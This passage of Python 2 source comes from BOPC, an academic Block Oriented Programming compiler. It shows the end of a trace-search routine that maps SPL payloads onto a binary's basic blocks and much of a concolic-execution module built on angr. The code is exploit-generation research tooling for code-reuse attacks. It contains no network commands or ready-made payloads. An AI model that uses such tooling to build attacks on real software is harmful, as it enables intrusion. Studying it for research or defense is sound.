                if stmt['target'] != -1 and stmt['target'] not in ADDR2NODE:
                    fatal("Return address '0x%x' not found" % stmt['target'])

                accblks[ stmt['uid'] ] = [ stmt['target'] ]


        # ---------------------------------------------------------------------
        # Pretty-print the accepted and clobbering blocks
        # --------------------------------------------------------------------- 
        dbg_prnt(DBG_LVL_2, 'Accepted block set (uid/block):')

        for a,b in sorted(accblks.iteritems()):
            dbg_prnt(DBG_LVL_2, '\t%s: %s' % (bold(a, pad=3), ', '.join(['0x%x' % x for x in b])))


        dbg_prnt(DBG_LVL_3, 'Clobbering block set (uid/block):')

        for a,b in sorted(cloblks.iteritems()):
            dbg_prnt(DBG_LVL_3, '\t%s: %s' % (bold(a, pad=3), ', '.join(['0x%x' % x for x in b])))


        # ---------------------------------------------------------------------
        # Shuflle statements and build the Delta Graph
        # ---------------------------------------------------------------------
        dbg_prnt(DBG_LVL_1, "Shuffling SPL payload...")

        for perm in self.__shuffle(accblks):        # start shuffling IR

            dbg_arb(DBG_LVL_1, 'Statement order:', perm)


            # build the adjacency list for that order
            adj = self.__mk_adjacency_list(perm)
            self.__adj = adj
            # remove goto statements as they are problematic
            adj, rm = self.__remove_goto(accblks, adj)

            perm = filter(lambda x : x not in rm, perm)
            perm = [(y, accblks[y]) for y in perm]

            dbg_arb(DBG_LVL_3, "Updated SPL statement adjacency list", adj)
            

            # create the Delta Graph for the given permutation        
            DG = D.delta(self.__cfg, self.__entry, perm, cloblks, adj)          
            

            # visualise delta graph
            #
            # visualize(DG.graph, VO_TYPE_DELTA)
            # exit()
   
       
            # select the K minimum induced subgraphs Hk from the Delta Graph
            # Hk = a subset of accepted blocks that reconstruct the execution of the SPL payload) 
            for size, Hk in DG.k_min_induced_subgraphs( PARAMETER_K ): 
                if size < 0:                        # Delta Graph disconnected?
                    dbg_prnt(DBG_LVL_1, "Delta Graph is disconnected.")
                    break                           # try another permutation (or mapping)
                
                # Paths that are too long should be discarded as it's unlikely to find a trace
                if size > MAX_ALLOWED_TRACE_SIZE:
                    dbg_prnt(DBG_LVL_1, "Subgraph size is too long (%d > %d). Discard it." % 
                                                    (size, MAX_ALLOWED_TRACE_SIZE))
                    break                           # try another permutation (or mapping)

                         
                # subgraph is ok. Flatten it and make it a "tree", to easily process it
                tree, pretty_tree = DG.flatten_graph(Hk)                

                emph('Flattened subgraph (size %d): %s' % (size, bolds(str(pretty_tree))), DBG_LVL_2)
                

                # TODO: this check will discard "trivial" solutions (all in 1 block)
                if size == 0:
                    warn('Delta graph found but it has size 0' )
                    # continue


                # enumerate all paths, and fork accordingly


                # Symbolic execution used?
                self.__options['simulate'] = True


                # visualise delta graph with Hk (induced subgraph) 
                #      visualize(DG.graph, VO_TYPE_DELTA)
                #        exit()

                #
                # TODO: In case of conditional jump, we'll have multiple "final" states.
                # We should check whether those states have conflicting constraints.
                #
                dbg_prnt(DBG_LVL_2, "Enumerating Tree...")

                self.__simstash = []


                # -------------------------------------------------------------
                # Easter Egg: When entry point is -1, we skip it and we directly
                # start from the next statement
                # -------------------------------------------------------------
                if self.__entry == -1:

                    if not isinstance(tree[0], tuple):
                        fatal('First statement is a conditional jump.')

                    # drop first transition (from entry to the 1st statement) and start
                    # directly from the 1st statement. There is no entry point.
                    # 
                    # also update the entry point
                    _, _, entry = tree.pop(0)

                    pretty_tree.pop(0)

                    emph("Easter Egg found! Skipping entry point")

                    emph('New flattened subgraph: %s' % bolds(str(pretty_tree)), DBG_LVL_1)
             
                else:
                    entry = self.__entry            # use the regular entry point


                try:
                    # create the simulation object
                    simulation = S.simulate(self.__proj, self.__cfg, cloblks, adj, self.__IR,
                                            regmap, varmap, rsvp, entry)
                except Exception, e:
                    dbg_prnt(DBG_LVL_2, "Cannot create simulation object. Discard current Hk")
                    continue


                self.__sim_objs = [simulation]
                self.__terminals = [tree[0][1]]

                self.__total_path = set()
                self.__path = set()
                retn = self.__enum_tree( tree, simulation )

                # del simulation                

                dbg_prnt(DBG_LVL_2, "Done. Enumeration finished with exit code %s" % bold(retn))

             
                # visualize(self.__cfg.graph, VO_TYPE_CFG, 
                #           options=VO_CFG | VO_ACC | VO_CLOB | VO_PATHS,
                #           func=self.__proj.kb.functions[0x41C750], entry=0x41C750, 
                #           paths=self.__total_path)
                # exit()


                if retn == 0 and self.__consistent_stashes():            
                    self.__nsolutions += 1
                    self.__options['#solutions'] = self.__nsolutions


                    # # visualise delta graph with Hk
                    #
                    # visualize(DG.graph, VO_TYPE_DELTA, options=VO_PATHS | VO_DRAW_INF_EDGES,
                    #           paths=self.__path)
                    # exit()


                    # # visualize CFG again
                    # visualize(self.__cfg.graph, VO_TYPE_CFG, 
                    #           options=VO_CFG | VO_ACC | VO_CLOB | VO_PATHS,
                    #           func=self.__proj.kb.functions[0x444A9D], entry=0x444A9D, 
                    #           paths=self.__total_path)
                    # exit()

                    print rainbow(textwrap.dedent('''\n\n
                            $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $
                            $                                                                     $
                            $                 *** S O L U T I O N   F O U N D ***                 $
                            $                                                                     $
                            $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $
                            '''))


                    emph(bolds('Solution #%d' % self.__nsolutions))
                    emph('Final Trace: %s' % bolds(str(pretty_tree)))

                    output = O.output( self.__options['format'] )
                    

                    output.comment('Solution #%d' % self.__nsolutions)
                    output.comment('Mapping #%d' % self.__ctr)
                    output.comment('Registers: %s' % ' | '.join(['%s <-> %s' % (virt, real) for virt, real in regmap]))
                    output.comment('Variables: %s' % ' | '.join(['%s <-> %s' % (var, hex(val) if isinstance(val, long) else str(val)) for var, val in varmap]))
     
                    output.comment('')
                    output.comment('Simulated Trace: %s' % pretty_tree)
                    output.comment('')

                    output.newline()

                    # cast it to a set to drop duplicates
                    for addr in set(self.__terminals):
                        output.breakpoint(addr)

                    output.newline()
                    output.comment('Entry point')
                    output.set('$pc', '0x%x' %  entry)
                    output.newline()

                    # for each active stash, dump all the solutions
                    for simulation in self.__simstash:
                        simulation.dump( output )

                    emph(bolds('BOPC is now happy :)'))

                    output.save(self.__options['filename'])                    
            
                    # save state
                    if self.__options['solutions'] == 'one':                  

                        for obj in self.__sim_objs: # free memory
                            del obj

                        return -1                   # we have a solution. No more mappings


                for obj in self.__sim_objs: # free memory
                    del obj

            del DG

        return 0                                    # try another mapping...      


    # ---------------------------------------------------------------------------------------------

    ''' ======================================================================================= '''
    '''                                     CLASS INTERFACE                                     '''
    ''' ======================================================================================= '''

    # ---------------------------------------------------------------------------------------------
    # __init__(): Class constructor. Simply initialize private members
    #
    # :Arg project: Instance of angr project
    # :Arg cfg: Binary's CFG
    # :Arg IR: SPL's Intermediate Representation (IR)
    # :Arg entry: Binary's entry point
    # :Arg options: Addtional options needed for the trace searching
    #
    def __init__( self, project, cfg, IR, entry, options ):
        self.__proj    = project                    # store arguments internally
        self.__cfg     = cfg
        self.__IR      = IR
        self.__entry   = entry
        self.__options = options

        self.__reg   = { }
        self.__mem   = { }
        self.__ext   = { }       

        self.__solved     = False
        self.__nsolutions = 0

        # make sure that the upper bound is valid
        assert(N_OUT_OF_ORDER_ATTEMPTS > 0 or N_OUT_OF_ORDER_ATTEMPTS == -1)
              

    # ---------------------------------------------------------------------------------------------
    # trace_searching(): Build a trace that cnnects all functional blocks.
    #
    # :Arg mark: A graph marking object
    # :Arg 
    # :Ret: If function can successfully find trace, function returns True. Otherwise it returns
    #       False.
    #
    def trace_searching( self, mark ):
        dbg_prnt(DBG_LVL_1, "Trace searching algorithm started.")

        self.__mark = mark                          # store object internally
        self.__ctr  = 0                             # clear mapping counter


        # create a mapping object
        mapping = M.map(mark.map_graph, self.__IR.nregs, self.__IR.nregvars)

        # enumerate all possible register and variable mappings
        rval = mapping.enum_mappings( self.__mapping_callback )

        dbg_prnt(DBG_LVL_1, "Trace searching algorithm finished with exit code %s" % bold(rval))
        
        return rval


    # ---------------------------------------------------------------------------------------------
    # raw_results(): 
    #
    def raw_results( self ):

        if not self.__solved:
            raise Exception('There is no trace!')

        return self.__reg, self.__mem, self.__ext


# -------------------------------------------------------------------------------------------------


================================================
FILE: source/simulate.py
================================================
#!/usr/bin/env python2
# -------------------------------------------------------------------------------------------------
#
#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  
#   dP"""88""""""Y8, ,d8P""d8P"Y8b,   dP"""88""""""Y8,  ,88"""Y8b,
#   Yb,  88      `8b,d8'   Y8   "8b,dPYb,  88      `8b d8"     `Y8
#    `"  88      ,8Pd8'    `Ybaaad88P' `"  88      ,8Pd8'   8b  d8
#        88aaaad8P" 8P       `""""Y8       88aaaad8P",8I    "Y88P'
#        88""""Y8ba 8b            d8       88"""""   I8'          
#        88      `8bY8,          ,8P       88        d8           
#        88      ,8P`Y8,        ,8P'       88        Y8,          
#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, 
#       88888888P"     `"Y8888P"'          88          `"Y8888888 
#
#   The Block Oriented Programming (BOP) Compiler - v2.1
#
#
# Kyriakos Ispoglou (ispo) - ispo@purdue.edu
# PURDUE University, Fall 2016-18
# -------------------------------------------------------------------------------------------------
#
#
# simulate.py:
#
# This module performs the concolic execution. That is it verifies a solution proposed by search
# module. For more details please refer to the paper.
#
#
# * * * ---===== TODO list =====--- * * *
#
#   [1]. Consider overlapping cases. For instance, when we write e.g., 8 bytes at address X and
#        then we write 4 bytes at address X+1, we may have issues
#
#
# -------------------------------------------------------------------------------------------------
from coreutils import *
import path

import angr
import archinfo
import struct
import signal
import copy
import time


# ------------------------------------------------------------------------------------------------
# Constant Definitions
# ------------------------------------------------------------------------------------------------

# WARNING: In case that relative addresses fail, adjust them.
# TODO: Add command line options for them.
MAX_MEM_UNIT_BYTES      = 8                         # max. memory unit size (for x64 is 8 bytes)
MAX_MEM_UNIT_BITS       = MAX_MEM_UNIT_BYTES << 3   # max. memory unit size in bits

ALLOCATOR_BASE_ADDR     = 0xd8000000                # the base address of the allocator
ALLOCATOR_GRANULARITY   = 0x1000                    # the allocation size
ALLOCATOR_CEIL_ADDR     = 0xd9000000                # the upper bound of the allocator
ALLOCATOR_NAME          = '$alloca'
                          
POOLVAR_BASE_ADDR       = 0xca000000                # the base address of the pool
POOLVAR_GRANULARITY     = 0x1000                    # (safe) offset between pools
POOLVAR_NAME            = '$pool'

SIM_MODE_INVALID        = 0xffff                    # invalid simulation mode
SIM_MODE_FUNCTIONAL     = 0x0001                    # simulation mode: Functional
SIM_MODE_DISPATCH       = 0x0000                    # simulation mode: Dispath

MAX_BOUND = 0x4000


# addresses that are not recognized as R/W but they are
_whitelist_ = [
    0x2010028,                                      # fs:0x28
    0xc0000000,                                     # __errno_location
    0xc0000070                                      # fopen() internal
]


# ALLOCATOR_BASE_ADDR     = 0x686180                # the base address of the allocator
# ALLOCATOR_CEIL_ADDR     = 0x686180+0x10000        # the upper bound of the allocator
# POOLVAR_BASE_ADDR       = 0x680040                # the base address of the pool
# MAX_BOUND = 0x400

EXTERNAL_UNINITIALIZED = -1

# -------------------------------------------------------------------------------------------------
# simulate: This class simulates the execution between a pair of accepted blocks
#
class simulate:
    ''' ======================================================================================= '''
    '''                             INTERNAL FUNCTIONS - AUXILIARY                              '''
    ''' ======================================================================================= '''

    # ---------------------------------------------------------------------------------------------
    # __sig_handler(): Symbolic execution may take forever to complete. To deal with it, we set
    #       an alarm. When the alarm is triggered, this singal handler is invoked and throws an
    #       exception that causes the symbolic execution to halt.
    #
    # :Arg signum: Signal number
    # :Arg frame: Current stack frame
    # :Ret: None.
    #
    def __sig_handler( self, signum, frame ):        
        if signum == signal.SIGALRM:                # we only care about SIGALRM

            # angr may ignore the exception, so let's throw many of them :P
            raise Exception("Alarm triggered after %d seconds" % SE_TRACE_TIMEOUT)
            raise Exception("Alarm triggered after %d seconds" % SE_TRACE_TIMEOUT)
            raise Exception("Alarm triggered after %d seconds" % SE_TRACE_TIMEOUT)
            raise Exception("Alarm triggered after %d seconds" % SE_TRACE_TIMEOUT)


    # ---------------------------------------------------------------------------------------------
    # __in_constraints(): This function checks whether a symbolic variable is part of the
    #       constraints.
    #
    # :Arg symv: The symbolic variable to check
    # :Arg state: Current state of the symbolic execution    
    # :Ret: If symv is in constraints, function returns True. Otherwise it returns False.
    #
    def __in_constraints( self, symv, state=None ):
        if not state:                               # if no state is given, use the current one
            state = self.__state


        # drop the "uninitialized" thing from everywhere
        symvstr = symv.shallow_repr().replace("{UNINITIALIZED}", "")

        # We may have this in the constraints: 
        #   <Bool Reverse(mem_801_64[7:0] .. Reverse(mem_801_64)[55:0]) != 0x0>
        #
        # But symvstr is:
        #   <BV64 Reverse(mem_801_64[7:0] .. Reverse(mem_801_64)[55:0])>  
        #
        # A quick fix is to drop the type:
        
        symvstr2 = symvstr[symvstr.find(' '):-1]
   
        # print 'symvstr2', symvstr2

        # this is the old style check 
        if symvstr2 in ' '.join([c.shallow_repr().replace("{UNINITIALIZED}", "") \
                                    for c in state.se.constraints]):
            return True

        
        # reinforce function with a stronger check
        for constraint in state.se.constraints:
        # print 'CONTRST', constraint

            try:
                # treat constraint as an AST and iterate over its leaves
                for leaf in constraint.recursive_leaf_asts:
                # print '\tLEAF', symv, symvstr, leaf, leaf.shallow_repr().replace("{UNINITIALIZED}", "")

                    # we can't compare them directly, so we cast them into strings first
                    # (not a very "clean" way to do that, but it works)
                    if leaf.shallow_repr().replace("{UNINITIALIZED}", "") == symvstr:
                        return True                 # symbolic variable found!

            except Exception, err:
                # fatal('__in_constraints() unexpected exception: %s' % str(err))
                pass

        return False                                # symbolic variable not found


    # ---------------------------------------------------------------------------------------------
    # __getreg(): Get the symbolic value of a register that has in the current state.
    #
    # :Arg reg: The name of the register
    # :Arg state: Current state of the symbolic execution
    # :Ret: The symbolic value for that register.
    #
    def __getreg( self, reg, state=None ):
        if not state:                               # if no state is given, use the current one
            state = self.__state

        try:
            return {    
                'rax' : state.regs.rax,
                'rbx' : state.regs.rbx,
                'rcx' : state.regs.rcx,
                'rdx' : state.regs.rdx,
                'rsi' : state.regs.rsi,
                'rdi' : state.regs.rdi,
                'rbp' : state.regs.rbp,
                'rsp' : state.regs.rsp,
                'r8'  : state.regs.r8,
                'r08' : state.regs.r8,
                'r9'  : state.regs.r9,
                'r09' : state.regs.r9,
                'r10' : state.regs.r10,
                'r11' : state.regs.r11,
                'r12' : state.regs.r12,
                'r13' : state.regs.r13,
                'r14' : state.regs.r14,
                'r15' : state.regs.r15,
            }[ reg ]
        except KeyError:
            fatal("Unknow register '%s'" % reg)


    # ---------------------------------------------------------------------------------------------
    # __mread(): This function reads from memory. The problem here is that we have to explicitly
    #       specify how to interpret memory (.uint8_t, .uint32_t, etc.), according to the number
    #       of bytes that we want to read. This results in cumbersome code, as we need a different
    #       case for every possible length, so we provide a simply interface through this function.
    #
    # :Arg state: Current state of the symbolic execution
    # :Arg addr: Address to read from
    # :Arg length: Number of bytes to read
    # :Ret: The contents of the desired memory "area".
    #
    def __mread( self, state, addr, length ):
       # dbg_prnt(DBG_LVL_3, "Reading %d bytes from 0x%x" % (length, addr))

        return state.memory.load(addr, length, endness=archinfo.Endness.LE)

        '''
        try:
            return {
                1 : state.mem[ addr ].uint8_t.resolved,
                2 : state.mem[ addr ].uint16_t.resolved,
                4 : state.mem[ addr ].uint32_t.resolved,
                8 : state.mem[ addr ].uint64_t.resolved
            }[ length ]
        except KeyError:
            dbg_prnt(DBG_LVL_3, "Reading %d bytes from 0x%x" % (length, addr))

            return state.memory.load(addr, length)  # for other sizes, just use load() 
        '''


    # ---------------------------------------------------------------------------------------------
    # __mwrite(): Similar to __mread() but this function writes to memory instead.
    #
    # :Arg state: Current state of the symbolic execution
    # :Arg addr: Address to write to
    # :Arg length: Number of bytes to write
    # :Ret: None.
    #
    def __mwrite( self, state, addr, length, value ):
        state.memory.store(addr, value, length, endness=archinfo.Endness.LE)

        '''        
        if   length == 1: state.mem[addr].uint8_t  = value
        elif length == 2: state.mem[addr].uint16_t = value
        elif length == 4: state.mem[addr].uint32_t = value
        elif length == 8: state.mem[addr].uint64_t = value
        else:
            dbg_prnt(DBG_LVL_3, "Writing %d bytes to 0x%x" % (length, addr))

            state.memory.store(addr, value, length)
        '''


    # ---------------------------------------------------------------------------------------------
    # __get_permissions(): Get 
    #
    # :Arg state: Current state of the symbolic execution
    # :Arg addr: Address to write to
    # :Arg length: Number of bytes to write
    # :Ret: None.
    #
    def __get_permissions( self, addr, length=1, state=None ):
        if not state:                               # if no state is given, use the current one
            state = self.__state

        # TODO: check permissions for addr+1, addr+2, ... addr+length-1
        #warn('POOL UPPER BOUND %x' % (POOLVAR_BASE_ADDR + self.__plsz))

        # special cases first
        if addr < 0x10000:
            return ''

        elif ALLOCATOR_BASE_ADDR <= addr and addr <= ALLOCATOR_CEIL_ADDR:
            return 'RW'   

        # TOOD:!!! 0x10000
        elif POOLVAR_BASE_ADDR <= addr and addr <= POOLVAR_BASE_ADDR + self.__plsz + 0x1000:
            return 'RW'

        # special case when a stack address is in the next page
        # TODO: make it relative from STACK_BASE_ADDR
        elif addr & 0x07ffffffffff0000 == 0x07ffffffffff0000:
            return 'RW'


        try:                    
            for _, sec in  self.__proj.loader.main_object.sections_map.iteritems():
                if sec.contains_addr(addr):                    
                    return ('R' if sec.is_readable   else '') + \
                           ('W' if sec.is_writable   else '') + \
                           ('X' if sec.is_executable else '')

            permissions = state.se.eval(state.memory.permissions(addr))

            return ('R' if permissions & 4 else '') + \
                   ('W' if permissions & 2 else '') + \
                   ('X' if permissions & 1 else '')

        except angr.errors.SimMemoryError:       
            return ''                               # no permissions at all
 

    # ---------------------------------------------------------------------------------------------
    # __symv_in(): Check whether a symbolic expression contains a given symbolic variable.
    #
    # :Arg symexpr: The symblolic expression
    # :Arg symv: The symbolic variable to look for
    # :Ret: If symexpr contains symv, function returns True. Otherwise it returns False.
    #
    def __symv_in( self, symexpr, symv ):
        if symexpr == None or symv == None:         # check special cases
            return False
            
#        if symexpr.shallow_repr() == symv.shallow_repr(): 
#            return True
        
        try:
            # treat symexpr as an AST and iterate over its leaves
            for leaf in symexpr.recursive_leaf_asts:
                
                # we can't compare them directly, so we cast them into strings first
                # (not a very "clean" way to do that, but it works)
                if leaf.shallow_repr() == symv.shallow_repr():  
                    return True                     # variable found!

            return False                            # variable not found

        except Exception, err:
            # This --> BOPC.py -ddd -b eval/nginx/nginx1 -s payloads/ifelse.spl -a load -f gdb -e -1
            # fatal('__symv_in() unexpected exception: %s' % str(err))

            raise Exception('__symv_in() unexpected exception: %s' % str(err))


    # ---------------------------------------------------------------------------------------------
    # __alloc_un(): "Allocate" memory for uninitialized symbolic variables (if needed).
    #
    # :Arg state: Current symbolic state of the execution
    # :Arg symv: The symbolic variable 
    # :Ret: If symv is uninitialized, function returns True; otherwise it returns False.
    #
    def __alloc_un( self, state, symv ):
        if symv == None:                            # make sure that variable is valid  
            return False

        # This code works fine for single variables but not for expressions:
        #
        # # nothing to do when variable is not uninitialized (i.e. initialized)
        # if "{UNINITIALIZED}" not in symv.shallow_repr():
        #     return False
        #
        # # After calling __alloc_un(), a variable will still have the UNINITIALIZED keyword
        # # even though, it has a single solution. Avoid initializing a variable twice.
        #
        # con = state.se.eval_upto(symv, 2)           # try to get 2 solutions
        # addr = state.se.eval(con[0])
        #
        # if len(con) > 1 or not (addr >= ALLOCATOR_BASE_ADDR and addr <= ALLOCATOR_CEIL_ADDR):
        #     # initialize variable
        addr = state.se.eval(symv)                  # try to concretize it


        #  print '***** ALLOC UN:', hex(addr), symv

        # we say < 0x1000, to catch cases with small offsets:
        # e.g., *<BV64 Reverse(stack_16660_262144[258239:258176]) + 0x68>
        # which gets concretized to 0x68 
        if addr < 0x1000 or addr > 0xfffffffffffff000:
        # if addr == 0: # < ALLOCATOR_BASE_ADDR or addr > ALLOCATOR_CEIL_ADDR

            alloca = ALLOCATOR_BASE_ADDR + self.__alloc_size

            # add the right contraint, to make variable, point where you want
            # address now becomes concrete (it has exactly 1 solution)

            # in case that addr > 0, make sure that symv is concretized from 0
            # (otherwise, we'll start before self.__alloc_size)
            x = state.se.BVS('x', 64)
            # print 'x is ', x, alloca + addr, symv

            # this indirection ensure that symv concretized to 64 bits
            state.add_constraints(x == alloca + addr)
            state.add_constraints(symv == x)

            # 
            # print '-->', symv, 'goes to ', hex(alloca + addr)

            self.__relative[alloca] = '%s + 0x%03x' % (ALLOCATOR_NAME, self.__alloc_size)

            
            self.__sym[ alloca ] = symv

            # shift allocator
            self.__alloc_size += ALLOCATOR_GRANULARITY

            
            return True                             # we had an allocation            
        
        return False                                # no allocation


    # ---------------------------------------------------------------------------------------------
    # __init_mem(): This function initializes (if needed) a memory cell. When we start execution
    #       from an arbitrary point, it's likely that the memory cell will be empty/uninitialized.
    #       Therefore, we need to assign a symbolic variable to it first.
    #
    #       A special case here is global variables from .bss and .data, which have a default value
    #       of 0. Therefore, these variables are actually uninitialized, but instead of containing
    #       a symbolic variable, they contain the default value (a bitvector of value 0). However,
    #       this can cause problems to the symbolic execution, as variables are already concrete.
    #
    # :Arg state: Current symbolic state of the execution
    # :Arg addr: Address of the variable
    # :Arg length: Length of the variable
    # :Ret: If memory was initialized, function returns True. Otherwise it returns False.
    #
    def __init_mem( self, state, addr, length=MAX_MEM_UNIT_BYTES ):
        if addr in self.__mem:                      # memory cell is already initialized
            return False
        
        self.__mem[addr] = length                   # simply mark used addresses

        # get ELF sections that give default values to their uninitialized variables
        bss  = self.__proj.loader.main_object.sections_map[".bss"]
        data = self.__proj.loader.main_object.sections_map[".data"]

        # print 'INIT MEMORY', hex(addr), self.__mread(state, addr, length)


        # if the memory cell is empty (None) or if the cell is initialized with a
        # default value, then we should give it a symbolic variable. You can also use: 
        #       state.inspect.mem_read_expr == None:
        #
        if  self.__mread(state, addr, length) == None             or \
            bss.min_addr        <= addr and addr <= bss.max_addr  or \
            data.min_addr       <= addr and addr <= data.max_addr or \
            ALLOCATOR_BASE_ADDR <= addr and addr <= ALLOCATOR_CEIL_ADDR:
            # bss.min_addr  <= addr and addr + length <= bss.max_addr  or \
            # data.min_addr <= addr and addr + length <= data.max_addr:

                # Alternative: state.memory.make_symbolic('mem', addr, length << 3) (big endian)
                symv = state.se.BVS("mem_%x" % addr, length << 3)


                # write symbolic variable to both states (current and original)
                self.__mwrite(state,         addr, length, symv)
                self.__mwrite(self.__origst, addr, length, symv)

                # get symbolic variable
                self.__sym[ addr ] = self.__mread(state, addr, length)

                return True                         # memory initialized


        # if it's uninitialized, simply add it variable to the __sym table
        # (but memory is not initialized at all)
        if "{UNINITIALIZED}" in self.__mread(state, addr, length).shallow_repr():
            self.__sym[ addr ] = self.__mread(state, addr, length)            


        return False                                # memory not initialized


    # ---------------------------------------------------------------------------------------------

    ''' ======================================================================================= '''
    '''                          INTERNAL FUNCTIONS - EXECUTION HOOKS                           '''
    ''' ======================================================================================= '''

    # ---------------------------------------------------------------------------------------------
    # __dbg_read_hook(): This callback function is invoked when a memory "area" is being read.
    #
    # :Arg state: Current state of the symbolic execution
    # :Ret: None.
    #
    def __dbg_read_hook( self, state ):
        if self.__disable_hooks:                    # if hooks are disabled, abort
            return

        # if you read/write memory inside the hook, this operation will trigger __dbg_read_hook()
        # again, thus resulting in a endless recursion. We need "exclusive access" here, so we
        # disable hooks inside function's body. This is pretty much like a mutex.
        self.__disable_hooks = True

        # TODO: the idea of simulation modes is not perfect
        #   a block can modify the data unintentionally
        #
        # update simulation mode

#        if self.__blk_start <= state.addr and state.addr < self.__blk_end:
#            self.__sim_mode = SIM_MODE_FUNCTIONAL
#        else:
#            self.__sim_mode = SIM_MODE_DISPATCH

        print 'state.inspect.mem_read_address', state.inspect.mem_read_address


        # if the address is an uninitialized symbolic variable, it can point to any location,
        # thus, when it's being evaluated it gets a value of 0. To fix this, we "allocate" some
        # memory and we make the address point to it.
        self.__alloc_un(state, state.inspect.mem_read_address)

        # now you can safely, "evaluate" address and concretize it
        addr = state.se.eval(state.inspect.mem_read_address)

        # concretize size (newer versions of angr never set state.inspect.mem_read_length to None)
        if state.inspect.mem_read_length == None:
            size = MAX_MEM_UNIT_BYTES               # if size is None, set it to default
        else:
            size = state.se.eval(state.inspect.mem_read_length)


        self.__init_mem(state, addr, size)          # initialize memory (if needed)
        

        if state.inspect.instruction:
            insn_addr = state.inspect.instruction
        else:
            insn_addr = state.addr

        dbg_prnt(DBG_LVL_3, '\t0x%08x: mem[0x%x] = %s (%x bytes)' % 
                    (insn_addr, addr, self.__mread(state, addr, size), size), pre='[R] ')
        

        # make sure that the address that you read from has +R permissions
        # TODO: fs:0x28 (canary hits an error here) 0x2010028
        if 'R' not in self.__get_permissions(addr, state) and addr not in _whitelist_:
            raise Exception("Attempted to read from an non-readable address '0x%x'" % addr)


        self.__disable_hooks = False                # release "lock" (i.e., enable hooks again)


    # ---------------------------------------------------------------------------------------------
    # __dbg_write_hook(): This callback function is invoked when a memory "area" is being written.
    #
    # :Arg state: Current state of the symbolic execution
    # :Ret: None.
    #
    def __dbg_write_hook( self, state ):
        if self.__disable_hooks:                    # if hooks are disabled, abort
            return
        
        # as in __dbg_read_hook(), we need mutual exclusion here as well
        self.__disable_hooks = True


        # update simulation mode
#        if self.__blk_start <= state.addr and state.addr < self.__blk_end:
#            self.__sim_mode = SIM_MODE_FUNCTIONAL
#        else:
#            self.__sim_mode = SIM_MODE_DISPATCH

        if state.inspect.instruction:
            insn_addr = state.inspect.instruction
        else:
            insn_addr = state.addr


        # as in __dbg_read_hook(), fix uninitialized addresses first
        self.__alloc_un(state, state.inspect.mem_write_address)

        # now you can safely, "evaluate" address and concretize it
        addr = state.se.eval(state.inspect.mem_write_address)

        # concretize size (newer versions of angr never set state.inspect.mem_read_length to None)
        if state.inspect.mem_write_length == None:
            size = MAX_MEM_UNIT_BYTES               # if size is None, set it to default
        else:
            size = state.se.eval(state.inspect.mem_write_length)
        

        dbg_prnt(DBG_LVL_3, '\t0x%08x: mem[0x%x] = %s (%x bytes)' % 
                    (insn_addr, addr, state.inspect.mem_write_expr, size), pre='[W] ')
        

#        print 'BEFORE', self.__mread(state, addr, size),  state.inspect.mem_write_expr
#        ISPO = state.inspect.mem_write_expr
        

        if 'W' not in self.__get_permissions(addr, state) and addr not in _whitelist_:
            raise Exception("Attempted to write to an non-writable address '0x%x'" % addr)
            

        # if we are trying to write to an immutable cell, currect execution path must be discarded
        if self.__sim_mode == SIM_MODE_DISPATCH: 
            if addr in self.__imm:

                oldval = state.se.eval(state.memory.load(addr, size))
                newval = state.se.eval(state.inspect.mem_write_expr)

                
                # if the new value is the same with the old one, we're good :)                
                if oldval != newval:            # if value really changes
                    self.__disable_hooks = False
                    
                    raise Exception("Attempted to write to immutable address '0x%x'" % addr)


        if state.inspect.mem_write_expr in self.__ext:
            
            self.__ext[ state.inspect.mem_write_expr ] = addr

        
        # if it's not the 1st time that you see this address
        if not self.__init_mem(state, addr, size):

            # if address is not concretized already and it's in the symbolic variable set
            if not isinstance(self.__mem[addr], tuple) and addr in self.__sym:
                symv = self.__sym[ addr ]           # get symbolic variable

                # check whether symbolic variable persists after write
                if not self.__symv_in(state.inspect.mem_write_expr, symv):
                    # Variable gets vanished. We should concretize it now, because, after
                    # that point, memory cell is dead; that is it's not part of the constraints
                    # anymore, as its original value got lost.
                    #
                    # To better illustrate the reason, consider the following code:
                    #       a = input();
                    #       if (a > 10 && a < 20) {
                    #           a = 0;
                    #           /* target block */
                    #       }
                    #
                    # Here, if we concretize 'a' at the end of the symbolic execution if will
                    # get a value of 0, which of course is not the desired one. The coorect
                    # approach, is to concretize, right before it gets overwritten.


                    # if variable is part of the constraints, add it to the set
                    if self.__in_constraints(symv, state):
                        val = state.se.eval(symv) # self.__mread(state, addr, size))
                        self.__mem[addr] = (val, size)

                        emph('Address/Value pair found: *0x%x = 0x%x (%d bytes)' % 
                                (addr, val, size), DBG_LVL_2)

                    # if the contents of that cell get lost, we cannot use AWP to write to it
                    # anymore
                    #
                    # TODO: Not sure if this correct
                    # UPDATE: Immutables should be fine when we write them with the exact same valut
#                    for i in range(8):
#                        self.__imm.add(addr + i)

        
#        print 'AFTER', self.__mread(state, addr, size),  state.inspect.mem_write_expr
#        self.FOO[ self.__mread(state, addr, size) ]  = ISPO

        # All external inputs (sockets, file descriptors, etc.) should be first written somewhere
        # in memory / registers eventually, so we can concretize them afterwards   

        self.__disable_hooks = False                # release "lock" (i.e., enable hooks again)


    # ---------------------------------------------------------------------------------------------
    # __dbg_symv_hook(): This callback function is invoked when a new symbolic variable is being
    #       created.
    #
    # :Arg state: Current state of the symbolic execution
    # :Ret: None.
    #
    def __dbg_symv_hook( self, state ):
        name = state.inspect.symbolic_name          # get name of the variable

        # we're only interested in symbolic variables that come from external inputs (sockets, 
        # file descriptors, etc.), as register and memory symbolic variables are already been
        # handled. 
        if not name.startswith('mem_') and not name.startswith('reg_') \
            and not name.startswith('x_') and not name.startswith('cond_'):
            
            # x  and cond are our variable so they're discarded too
            dbg_prnt(DBG_LVL_3, " New symbolic variable '%s'" % name, pre='[S]')

            self.__ext[ state.inspect.symbolic_expr ] = EXTERNAL_UNINITIALIZED


    # ---------------------------------------------------------------------------------------------
    # __dbg_reg_wr_hook(): This callback function is invoked when a register is being modified.
    #
    # :Arg state: Current state of the symbolic execution
    # :Ret: None.
    #
    def __dbg_reg_wr_hook( self, state ):    
        if self.__disable_hooks:                    # if hooks are disabled, abort
            return

        # as in __dbg_read_hook(), we need mutual exclusion here as well
        self.__disable_hooks = True

  
        # update simulation mode
#        if self.__blk_start <= state.addr and state.addr < self.__blk_end:
